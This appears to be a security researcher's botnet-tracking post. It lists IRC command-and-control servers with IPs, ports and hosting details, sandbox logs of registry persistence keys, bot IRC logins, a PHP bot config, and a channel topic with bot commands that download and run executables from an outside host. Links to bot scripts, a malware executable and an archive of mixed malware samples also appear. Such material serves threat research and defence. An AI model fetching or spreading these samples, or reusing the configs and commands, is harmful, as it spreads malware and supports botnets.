Resolved : [bad-girl.no-ip.biz] To [91.97.55.200]
Remote Host    Port Number
91.97.55.200    58281
Registry Modifications
The following Registry Key was created:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{E3FB2449-64ED-226C-A731-D39F73A3069B}
The newly created Registry Values are:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{E3FB2449-64ED-226C-A731-D39F73A3069B}]
StubPath = "%System%\svhost32.exe" so that svhost32.exe runs every time Windows starts
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Windows Host Prozess = "%System%\svhost32.exe" so that svhost32.exe runs every time Windows...

50.22.148.142 (linux bots hosted in United States Dallas Softlayer Technologies Inc)
var $config = array("server"=>"50.22.148.142", "port"=>1345, "pass"=>"", "prefix"=>"ClickDown", "maxrand"=>4, "chan"=>"#dada", "key"=>"", "modes"=>"+s", "password"=>"click", "trigger"=>".", "hostauth"=>"*" // * for any hostname
Invisible Users: 31
Channels: 1 channels formed
Clients: I have 32 clients and 0 servers
Local users: Current Local Users: 32 Max: 779
Global users: Current Global Users: 32 Max: 288
download link here: http://50.22.148.142/pepinas.txt? more...

blenderartists (gbot hosted in United States San Antonio Slicehost)
DNS Queries
DNS Query Text
blenderartists.org IN A +
zonetf.com IN A +
zonedg.com IN A +
freeonlinedatingtips.net: type A, class IN, addr 69.42.208.146
bigspiderwomen.com: type A, class IN, addr 64.191.90.101
sharewareconnection.com: type A, class IN, addr 216.240.159.81
HTTP Queries
HTTP Query Text
zonetf.com POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSvfuFuTLiv0agDgGxMl%2FvDr3WCGkrg%2B8OtBfBvOZTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D HTTP/1.1
blenderartists.org GET /external/Banners/facebook2.jpg?tq=gHZutDyMv5rJcyG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0
zonedg.com GET /images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917W65rJqlLfgPiWW1cg HTTP/1.0
Threads Created
PId...

a1b.dyndns.tv (botnet hosted in Malaysia Kuala Lumpur Piradius Net)
Remote Host    Port Number
124.217.248.138    20
PASS google_cache2.tmp
NICK n{Ganja-USA|XP}752152
USER 5074 "" "TsGh" :5074
JOIN #panama
PONG :irc.sdfadsf.com
another dbs same ip:
– DNS Queries:
Name    Query Type    Query Result    Successful    Protocol
security10.sytes.net    DNS_TYPE_A    124.217.248.138    YES    udp
– IRC Conversations:
From ANUBIS:1039 to 124.217.248.138:20
Nick: n{Ganja-AUT|XP}731969
Username: 0359
Server Pass: google_cache2.tmp
Joined Channel: #mexico...

jjjjjj.ahrampress.net (botnet hosted in China Beijing Chinanet Hebei Province Network)
jjjjjj.ahrampress.net ip: 123.183.217.32
jjjjjj.ahrampress.net:6943
123.183.217.32 5943
123.183.217.32 6943
PASSWORD: eee
Nick [N00_USA_XP_39922187] rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #j
Channel: #j
Topic is '.r.getfile -S|.r.getfile http://61.136.59.34/LWC/img/mheader.png C:radr.exe 1|.asc -S|.http http://61.136.59.34/LWC/dc0.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0...

dc.drwhox.com (botnet hosted in China Beijing Chinanet Hebei Province Network)
Remote Host    Port Number
112.78.112.208    80
218.85.133.201    80
61.136.59.34    80
123.183.217.32    5943
123.183.217.32    6943
27.54.225.102    6943
PRIVMSG #dc1 :Err0r..
MODE [N00_USA_XP_7890652] @ -ix
00000030 | 5F36 3033 3038 3139 5D18 E740 0D0A 7365 | _6030819]..@..se
00000040 | 6E64 2023 6A2C 234D 6120 6F6F 6F6F 0D0A | nd #j,#Ma oooo..
00000050 | 5052 5256 4D53 4720...

irc.racrew.info (linux perl bots hosted in United States Arkadelphia Ezclick.net Inc)
IRC connection: $servidor='75.46.208.5' unless $servidor; my $porta='9191';
Channels: 5 channels formed
Clients: I have 103 clients and 0 servers
Local users: Current Local Users: 103 Max: 143
Global users: Current Global Users: 103 Max: 417
bot link: http://80.73.145.20/seguridad/c.txt
downloader link: http://80.73.145.20/seguridad/ec.txt?
rabot.txt: http://80.73.145.20/seguridad/rabot.txt
info about hosting: http://whois.domaintools.com/75.46.208.5

70.39.71.240 (botnet hosted in United States Missoula Sharktech Internet Services)
Remote Host    Port Number
70.39.71.240    51987
NICK {New}[USA-1244024-XP]
USER 8408605 "" "lol" :8408605
JOIN ##Crysis
Registry Modifications
* The newly created Registry Value is:
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + winlog = "%Temp%\lsass.exe" so that lsass.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name    Process Filename    Main...

17 MB of exe files from different malware
Inside the rar you have different malware such as RATs, worms, password stealers, bots, mass emailers, etc.
Download: http://81878971.filesonthe.net

play.mygreatbar.com (bfbot hosted in China Tianjin Longchishenzhou-ltd)
play.mygreatbar.com: type A, class IN, addr 61.136.59.34
UDP Protocol Dest IP:61.136.59.34 Dest Port:1863
exe file here: http://91.217.162.104/m.exe
info about hosting: http://whois.domaintools.com/61.136.59.34